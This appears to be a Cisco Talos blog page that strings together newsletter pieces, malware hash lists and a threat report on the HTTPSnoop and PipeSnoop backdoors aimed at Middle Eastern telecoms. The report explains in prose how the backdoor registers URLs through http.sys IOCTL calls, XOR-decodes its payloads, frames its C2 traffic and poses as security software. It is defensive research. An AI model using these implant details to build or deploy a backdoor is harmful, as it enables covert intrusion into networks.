**China’s government has accused the U.S. of a campaign to infiltrate servers belonging to tech company Huawei to conduct cyber attacks and steal information,** potentially as far back as 2009. China's Ministry of State Security on Wednesday outlined the accusations in a post on its WeChat account Wednesday. "In 2009, the Office of Tailored Access Operations started to infiltrate servers at Huawei's headquarters and continued conducting such surveillance operations," the post reads. China and the U.S. have continually launched accusations of spying on one another this year as tensions between the two nations rise. China also accused the U.S. National Security Agency of installing a backdoor tool that "runs secretly on thousands of network devices in many countries around the world” meant to steal data from other governments, including China and Russia. (Nikkei Asia, The Register)

**Can’t get enough Talos?**

*   New threat actor targets Middle Eastern telcos
*   How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack
*   Middle East telcos targeted by new malware with suspected nation-state backing
*   APJC Monthly Talos Update

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> _Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a  
**MD5:** 200206279107f4a2bb1832e3fcd7d64c  
**Typical Filename:** lsgkozfm.bat  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

What’s the point of press releases from threat actors?

Cisco Talos has discovered a new intrusion set we're calling "ShroudedSnooper" consisting of two new implants "HTTPSnoop" and "PipeSnoop" targeting telecommunications firms in the middle-east.

Tuesday, September 19, 2023 08:09

*   Cisco Talos recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East.
*   HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
*   We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.
*   We identified DLL- and EXE-based versions of the implants that masquerade as legitimate security software components, specifically extended detection and response (XDR) agents, making them difficult to detect.
*   We assess with high confidence that both implants belong to a new intrusion set we’re calling “ShroudedSnooper.” Based on the HTTP URL patterns used in the implants, such as those mimicking Microsoft’s Exchange Web Services (EWS) platform, we assess that this threat actor likely exploits internet-facing servers and deploys HTTPSnoop to gain initial access.
*   This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting telecoms. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data.

**ShroudedSnooper activity highlights latest threat to telecommunications entities**

This specific cluster of implants involving HTTPSnoop and PipeSnoop and associated tactics, techniques, and procedures (TTPs) do not match a known group that Talos tracks. We are therefore attributing this activity to a distinct intrusion set we’re calling “ShroudedSnooper.”

In recent years, there have been many instances of state-sponsored actors and sophisticated adversaries targeting telecommunications organizations around the world. In 2022, this sector was consistently a top-targeted vertical in Talos IR engagements. Telecommunications companies typically control a vast number of critical infrastructure assets, making them high-priority targets for adversaries looking to cause significant impact. These entities often form the backbone of national satellite, internet and telephone networks upon which most private and government services rely. Furthermore, telecommunications companies can serve as a gateway for adversaries to access other businesses, subscribers or third-party providers.

Our IR findings are consistent with reports from other cybersecurity firms outlining various attack campaigns targeting telecommunications companies globally. In 2021, CrowdStrike disclosed a years-long campaign by the LightBasin (UNC1945) advanced persistent threat (APT) targeting 13 telecommunications companies globally using Linux-based implants to maintain long-term access in compromised networks. That same year, McAfee discovered activity targeting telecommunication firms in Europe, the U.S. and Asia dubbed “Operation Diànxùn” linked to the Chinese APT group MustangPanada (RedDelta). This campaign heavily relied on the PlugX malware implant. Also in 2021, Recorded Future reported that four distinct Chinese state-sponsored APT groups were targeting the email servers of a telecommunications firm in Afghanistan, again using the PlugX implant.

The targeting of telecommunications firms in middle-east Asia is also quite prevalent. In January 2021, Clearsky disclosed the “Lebanese Cedar” APT leveraging web shells and the “Explosive” RAT malware family to target telecommunication firms in the U.S., U.K. and middle-east Asia. In a separate campaign, Symantec noted the MuddyWater APT targeting telecommunication organizations in the Middle East, deploying web shells on Exchange Servers to instrument script-based malware and dual-use tools to carry out hands-on-keyboard activity.

**Masquerading as a security component**

We also discovered both HTTPSnoop and PipeSnoop masquerading as components of Palo Alto Networks’ Cortex XDR application. The malware executable is named “CyveraConsole.exe,” which is the application that contains the Cortex XDR agent for Windows. The variants of both HTTPSnoop and PipeSnoop we discovered had their compile timestamps tampered with but masqueraded as XDR agent from version 7.8.0.64264. Cortex XDR v7.8 was released on Aug. 7, 2022, and decommissioned on April 24, 2023. Therefore, it is likely that the threat actors operated this cluster of implants during the aforementioned timeframe. For example, one of the “CyveraConsole.exe” implants was compiled on Nov. 16, 2022, falling approximately in the middle of this time window of the life of Cortex XDR v7.8.

Version information of HTTPSnoop sample with fake Cortex XDR information.

**A primer on HTTPSnoop**

HTTPSnoop is a simple, yet effective, new backdoor that uses low-level Windows APIs to interact directly with the HTTP device on the system. It leverages this capability to bind to specific HTTP(S) URL patterns to the endpoint to listen for incoming requests. Any incoming requests for the specified URLs are picked up by the implant, which then proceeds to decode the data accompanying the HTTP request. The decoded HTTP data is, in fact, shellcode that is then executed on the infected endpoint.

HTTPSnoop consists of the same code across all observed variants, with the key difference in samples being the URL patterns that it listens for. So far, we have discovered three variations in the configuration:

*   Generic HTTP URL-based: Listens for generic HTTP URLs specified by the implant.
*   EWS-related URLs listener: Listen for URLs that mimic Microsoft’s Exchange Web Services (EWS) API.
*   OfficeCore’s Location Based Services (LBS)-related URL listener: Listens for URLs that mimic OfficeCore’s LBS/OfficeTrack and telephony applications.

**HTTPSnoop variants**

The DLL-based variants of HTTPSnoop usually rely on DLL hijacking in benign applications and services to get activated on the infected system. The attackers initially crafted the first variant of the implant on April 17, 2023, so that it could bind to specific HTTP URLs on the endpoint to listen for incoming shellcode payloads that are then executed on the infected endpoint. These HTTP URLs resemble those of Microsoft’s Exchange Web Services (EWS) API, a product that enables applications to access mailbox items.

A second variant, generated on April 19, 2023, is nearly identical to the initial version of HTTPSnoop from April 17. The only difference is that this second variant is configured to listen to a different set of HTTP URLs on Ports 80 and 443 exclusively, indicating that the attackers may have intended to focus on a separate non-EWS internet-exposed web server.

The attackers then built a third variant that consisted of a killswitch URL and one other URL that the implant listens to. This implant was crafted on April 29, 2023. This version of the implant was likely an effort to minimize the number of URLs that the implant listens to, to reduce the likelihood of detection.

**HTTPSnoop analysis**

The DLL analyzed simply consists of two key components:

*   Encoded Stage 2 shellcode.
*   Encoded Stage 2 configuration.

The malicious DLL on activation will XOR decode the Stage 2 configuration and shellcode and run it.

Single byte XOR routine to decode Stage components.

**Stage 2 analysis**

Stage 2 is a single-byte XOR’ed backdoor shellcode that uses the accompanying configuration data to listen for incoming shellcode to execute on the infected endpoint. As part of Stage 2, the sample proceeds to make numerous calls to kernel devices in order to set up a web server endpoint for its backdoor. The implant opens a handle to “\\Device\\Http\\Communication” and calls the HTTP driver API “http.sys!UlCreateServerSession” with IOCTL code 0x1280000to initialize the connection to the HTTP server. The sample continues by creating a new URL group using http.sys!UlCreateUrlGroup with IOCTL code 0x128010 opens a request queue device “\\Device\\Http\\ReqQueue” and sets the new URL group for the session using http.sys!UlSetUrlGroupwith IOCTL code 0x12801d.  

Using the decrypted configuration the sample begins to feed the URLs to the HTTP server via http.sys!UlAddUrlToUrlGroup with IOCTL code l 0x128020. This binds the specified  URL patterns to a listenable endpoint for the malware to communicate. The implant takes care to _not_ overwrite already existing URL patterns being serviced by the HTTP server, to coexist with previous configurations on the server, such as EWS and prevent URL listener collisions.

With the URLs bound to listen on the kernel’s web server, the malware proceeds to listen in a loop for incoming HTTP requests, carried out via http.sys!UlReceiveHttpRequest. If the headers from the HTTP request contain a configured keyword, in this particular sample’s case, “api\_delete”, the listening loop for the infection will terminate. Once a request comes in, it creates a new thread and calls http.sys!UlReceiveEntityBody with IOCTL codes 0x12403b, or 0x12403a when running Windows Server 2022 version 21H2, to receive the full message body from the implant operator. If the request has valid data, the sample proceeds to process the request or else returns an HTTP 302 Found redirect response to the requester.

Valid data comes in the form of a base64-encoded request body. Upon decoding, it proceeds to use the first byte of data to single-byte XOR-decode the rest of the data. Once decrypted, a simple data structure is unveiled. The payload received from the operator is an arbitrary shellcode payload. The execution metadata consists of an uninitialized pointer and size, plus the size of the metadata structure, which is a constant 0x18. These uninitialized pointers are initialized by the execution of the shellcode, used to pass back data to the implant to eventually send back to the operator as a response to the HTTP request.

Payload structure from C2.

The ultimate result of the execution of the arbitrary shellcode is returned to the requester (operator) in the form of a base64-encoded XOR-encoded blob. The first byte of the response is a random letter from the ASCII table, which is used to XOR the rest of the response. With this, the malware sends back a 200 OK response with the encoded execution result in its body via http.sys!UlSendHttpResponsewith IOCTL code  0x12403f.

**Introducing PipeSnoop**

The PipeSnoop implant, created in May 2023, is a simple implant that can run arbitrary shellcode payloads on the infected endpoint by reading from an IPC pipe. Although semantically similar, the PipeSnoop implant should not be considered an upgrade of HTTPSnoop. Both implants are likely designed to work under different environments. The HTTP URLs used by HTTPSnoop along with the binding to the built-in Windows web server indicate that it was likely designed to work on internet-exposed web and EWS servers. PipeSnoop, however, as the name may imply, reads and writes to and from a Windows IPC pipe for its input/output (I/O) capabilities This suggests the implant is likely designed to function further within a compromised enterprise--instead of public-facing servers like HTTPSnoop — and probably is intended for use against endpoints the malware operators deem more valuable or high-priority. PipeSnoop is likely used in conjunction with another component that is capable of feeding it the required shellcode. (This second component is currently unknown.)

**PipeSnoop analysis**

PipeSnoop is a simple backdoor that, much like HTTPSnoop, aims to act as a backdoor executing arbitrary shellcode on the infected endpoint. In contrast to HTTPSnoop however, PipeSnoop does not rely on initiating and listening for incoming connections via an HTTP server. As indicated by the name, PipeSnoop will simply attempt to connect to a pre-existing named pipe on the system. Named pipes are a common means of Inter-Process Communication (IPC) on the Windows operating system. The key requirement here is that the named pipe that PipeSnoop connects to should have been already created/established - PipeSnoop does not attempt to create the pipe, it simply tries to connect to it. This capability indicates that PipeSnoop cannot function as a standalone implant (unlike HTTPSnoop) on the endpoint. It needs a second component, that acts as a server that will obtain arbitrary shellcode via some methods and will then feed the shellcode to PipeSnoop via the named pipe.

Implant connecting to a named pipe to obtain arbitrary shellcode.

**Masquerading as benign traffic on the wire**

We’ve observed HTTPSnoop listening for URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over Ports 443 and 444:

Some of the HTTPSnoop implants use HTTP URLs that masquerade as those belonging to OfficeTrack, an application developed by software company OfficeCore that helps users manage different administrative tasks. In several instances, we see URLs ending in “lbs” and “LbsAdmin,” references to the application’s earlier name (OfficeCore’s LBS System) before it was later rebranded as OfficeTrack. OfficeTrack is currently marketed as a workforce management solution geared toward providing coverage for logistics, order orchestration and equipment control. OfficeTrack is especially marketed towards telecommunication firms_._ Some of the LBS URLs used by HTTPSnoop are:

The HTTP URLs also consist of patterns mimicking provisioning services from an Israeli telecommunications company. This telco may have used OfficeTrack in the past and/or currently uses this application, based on open-source findings.

Some of the URLs in the HTTPSnoop implant are also related to those of systems from the telecommunications firm:

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

_**Note**: We have shared our findings with both Microsoft and Palo Alto Networks for this threat and intrusion set._

ClamAV detections are available for this threat:  
Win.Trojan.WCFBackdoor

**Indicators of Compromise (IOCs)**

Indicators of Compromise associated with this threat can be found here.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with Novel Implants

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50.

Thursday, September 14, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

I’m at the point in the calendar year where I’m a sponge for NFL content. I couldn’t be happier to escape from my six-month American football-free slumber and am ready to watch games three days a week and listen to NFL podcasts or read power rankings the other four.

So of course, I wasn’t going to miss this feature in Dark Reading from the NFL’s chief information security officer, which just happens to include several shoutouts to Talos and Cisco. Talos is a valuable security partner with the NFL, helping secure their major events like the NFL Draft and Super Bowl, the most-watched entertainment event in the U.S. every year.

One of the things that Tomás Maldonado said in the Dark Reading interview really stood out to me — that he’s worried about deepfakes of NFL players being used in scams. Deepfakes have been making the rounds for years in scams of celebrities and politicians seeming to ask for various things (often money), and Maldonado said he’s worried that attackers could start using the likenesses of popular NFL players for scams and spam.

I actually hadn’t realized that deepfakes had already been around in the NFL sphere for a while, though.

In an ESPN “30 for 30” documentary in 2021, the creators used deepfake, AI voices for former Raiders owner Al Davis and former commissioner Pete Rozelle, who both died many years before the creation of this documentary. Public reception was mixed, at best.

The league’s Dallas Cowboys are also jumping on the AI train and created a hologram, AI-powered version of team owner Jerry Jones. Fans can pay $55 to take a tour of the Cowboys’ AT&T Stadium and ask the AI version of Jones questions (as a Browns fan, I mainly would just like to thank him for only asking for a fifth-round pick in exchange for receiver Amari Cooper).

Bad actors have shown they will literally use any and all forms of deepfakes to try and trick users. So it’s not hard to see where Maldonado is coming from with his concerns.

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50. This just isn’t a particular attack vector I had considered before — I always assumed deepfakes were reserved for political leaders or some of the highest-profile people in the world.

And while I couldn’t find any current examples of where this is actively happening in the wild, it’s not a crazy jump to think that if ESPN can create a convincing AI version of Al Davis that someone else can’t make an AI voice that sounds just like Aaron Rodgers asking for money or a fake Russell Wilson pushing season ticket “deals.”

**The one big thing**

Microsoft disclosed two zero-day vulnerabilities as part of this monthly security update on Tuesday, one of which already has proof-of-concept code floating around in the wild. There are five other critical vulnerabilities included in September’s Patch Tuesday, which is relatively low for a traditional Microsoft security release, and 56 vulnerabilities the company considers “important.”

**Why do I care?**

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges. Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how exactly an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes. Microsoft’s warnings about these vulnerabilities indicate attackers are already exploiting these issues in the wild, even prior to Tuesday’s patch, so all users should be sure to patch these ASAP.

**So now what?**

Microsoft’s security update guide has all the patches users need to install, which everyone should do now if they haven’t already. Talos’ Patch Tuesday blog also outlines several Snort rules we released to detect the exploitation of some of these vulnerabilities.

**Top security headlines of the week**

**Apple released a series of security updates over the past week that users of all the companies’ mobile devices are encouraged to install as soon as possible.** A security update on Sept. 7 warned that users needed to update to iOS 16.6.1 or iPadOS 16.6.1 right away to fix security updates that attackers were actively exploiting in the wild. In some cases, these exploits led to the installation of spyware on targeted devices. Apple said in an advisory that, “Processing a maliciously crafted image may lead to arbitrary code execution.” The company followed that up with another security update on Monday for older models of iPhones, iPads, Macs and other Apple devices that "provides important security fixes,” likely the same vulnerabilities. Apple was scheduled to announce its newest iPhone and Apple Watch at an event Wednesday. (USA Today, CNET)

**The U.S. and U.K. have sanctioned more alleged members of the Trickbot cybercrime ring.** Law enforcement officials in both countries announced sanctions against 11 individuals they claim are “involved in management and procurement for the Trickbot group.” Trickbot is known for targeting large businesses and organizations with ransomware and has alleged ties to the Russian government. Seven of the people listed are also charged with working with the Conti ransomware group, which broke up at the end of 2022. These people are alleged "administrators, managers, developers, and coders” for Conti. The U.K.’s National Crime Agency reported that Trickbot attacks have generated an estimated $180 million from victims, $33.6 million of that coming from victims in the U.K. The group’s list of reported victims includes hospitals, schools and government agencies across the globe. (TechCrunch, Dark Reading)

**Security researchers are concerned that adversaries are starting to crack stolen passkeys taken during a data breach at LastPass.** More than 150 people recently affected by cryptocurrency wallet thefts were LastPass users, leading to the equivalent of $35 million in virtual currency being stolen. Many cryptocurrency consumers use security phrases to protect their wallets, and then store that phase in an encrypted folder inside a password manager like LastPass. If an attacker were able to learn that phrase, they could essentially access all the victims’ cryptocurrency holdings tied to that key. LastPass has yet to comment on the researchers’ findings because they said an active law enforcement investigation is still ongoing into the 2022 breach. (Krebs on Security, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #154: SapphireStealer hits the open internet
*   Researcher Spotlight: You can try to hide your firmware from Kelly Patterson, but she’ll find it (and break it)
*   Eight vulnerabilities in Open Automation Software Platform could lead to information disclosure, improper authentication
*   Cyber-criminals Exploit GPUs in Graphic Design Software

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> _Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** d5763a87ec22a583b9dd853e31a9d4cb187d81251ce51099ce3d0f749bbf405a  
**MD5:** 5cedec562076ac629453cc99dd0cdda6  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5763a.in03.Talos

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827  
**MD5:** bf357485cf123a72a46cc896a5c4b62d  
**Typical Filename:** bf357485cf123a72a46cc896a5c4b62d.virus  
**Claimed Product:** N/A  
**Detection Name:** W32.Auto:d5219579ee.in03.Talos

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991